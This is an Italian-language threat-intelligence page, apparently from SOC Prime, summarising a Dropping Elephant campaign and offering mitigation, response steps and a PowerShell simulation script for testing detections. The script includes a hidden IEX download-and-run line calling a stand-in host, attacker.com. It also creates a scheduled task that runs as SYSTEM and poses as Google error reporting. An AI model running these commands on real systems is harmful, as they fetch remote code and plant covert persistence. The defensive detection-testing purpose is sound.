SOC Prime Bias: Critico

19 Jun 2026 07:55 UTC

Malware alla Moda: Dentro la Catena di Loader di Dropping Elephant

Author Photo
SOC Prime Team linkedin icon Segui
Malware alla Moda: Dentro la Catena di Loader di Dropping Elephant
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Una sofisticata campagna attribuita a Dropping Elephant utilizza documenti esca a tema Cina per distribuire un trojan di accesso remoto aggiornato e residente in memoria. L’intrusione si basa sul caricamento laterale DLL tramite un binario Microsoft legittimo e sul caricatore di shellcode Donut per evitare il rilevamento su disco. Il carico finale utilizza anche metodi avanzati di evasione, tra cui l’appiattimento del flusso di controllo e la ricostruzione delle API in tempo reale.

Indagine

I ricercatori di Rapid7 hanno scoperto la minaccia durante una caccia proattiva che è iniziata con un collegamento Windows dannoso mascherato da documento PDF. La loro indagine ha seguito la catena di carico utile dalla messa in scena iniziale su chinagreenenergy[.]org tramite il caricamento laterale DLL di APPWIZ.cpl all’esecuzione di un RAT in memoria. L’analisi a livello di codice con Diaphora ha confermato una discendenza comune con precedenti campioni di Dropping Elephant nonostante ampi rimaneggiamenti.

Mitigazione

I difensori dovrebbero dare priorità alle rilevazioni comportamentali, come file di collegamento che avviano PowerShell e messa in scena sospetta di carichi utili in C:UsersPublic. È anche importante monitorare i compiti pianificati con nomi insoliti e identificare il caricamento laterale DLL da directory inaspettate. Inoltre, le difese degli endpoint necessitano di visibilità a livello di memoria per rilevare la manomissione con AMSI, WLDP e ETW.

Risposta

Se viene rilevata questa attività, isolare immediatamente i sistemi colpiti per interrompere ulteriori traffici di comando e controllo. Eseguire la forense della memoria per identificare il RAT iniettato e ispezionare i compiti pianificati per la persistenza. Anche i registri di rete dovrebbero essere esaminati per traffico HTTPS non autorizzato verso i domini C2 noti e per qualsiasi segno di esfiltrazione di file.

Flusso di attacco

Esecuzione di Simulazione

Requisito: La Verifica Pre-volo di Telemetria e Baseline deve essere superata.

Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVE riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrativa e Comandi dell’Attacco: L’avversario mira a stabilire la persistenza ed eseguire un downloader. Per bypassare i filtri standard delle email, utilizzano un collegamento denominato GRES3001.lnk che appare come un PDF. Quando viene cliccato, chiama conhost.exe per eseguire uno script PowerShell. Contemporaneamente, stabiliscono la persistenza creando un compito pianificato chiamato GoogleErrorReport che è progettato per eseguire Fondue.exe da una directory pubblica, mascherandosi come un legittimo reporter di errori di Google per evitare ispezioni casuali.

  • Script di Test di Regressione:

    # 1. Simulare il comportamento di Scorciatoia/Conhost
    # Simuliamo l'esecuzione di conhost.exe con la stringa specifica nella riga di comando
    Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" 
    # Nota: Per rispecchiare strettamente 'CommandLine contains GRES3001.lnk' della regola, simuliamo la chiamata del processo come se provenisse da quel file.
    # Poiché non possiamo facilmente falsificare il nome del processo padre in uno script semplice, simuliamo la stringa di riga di comando prevista.
    Write-Host "[!] Simulazione di attivazione di GRES3001.lnk..."
    $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Caricato'"
    # In un ambiente reale, il campo 'CommandLine' in Sysmon conterrebbe la stringa di destinazione.
    
    # 2. Simulare il Compito Pianificato e Fondue.exe caricamento laterale
    Write-Host "[!] Simulazione del compito pianificato GoogleErrorReport..."
    New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force
    Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload"
    
    $TaskName = "GoogleErrorReport"
    $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe"
    Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Compito Dropping Elephant Simulato" -User "SYSTEM" -Force
    
    Write-Host "[+] Simulazione Completa. Controlla SIEM per avvisi."
  • Comandi di Pulizia:

    # Rimuovere il binario di malware fittizio
    Remove-Item -Path "C:UsersPublicFondue.exe" -Force
    
    # Rimuovere il compito pianificato maligno
    Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false
    
    Write-Host "[+] Pulizia Completa."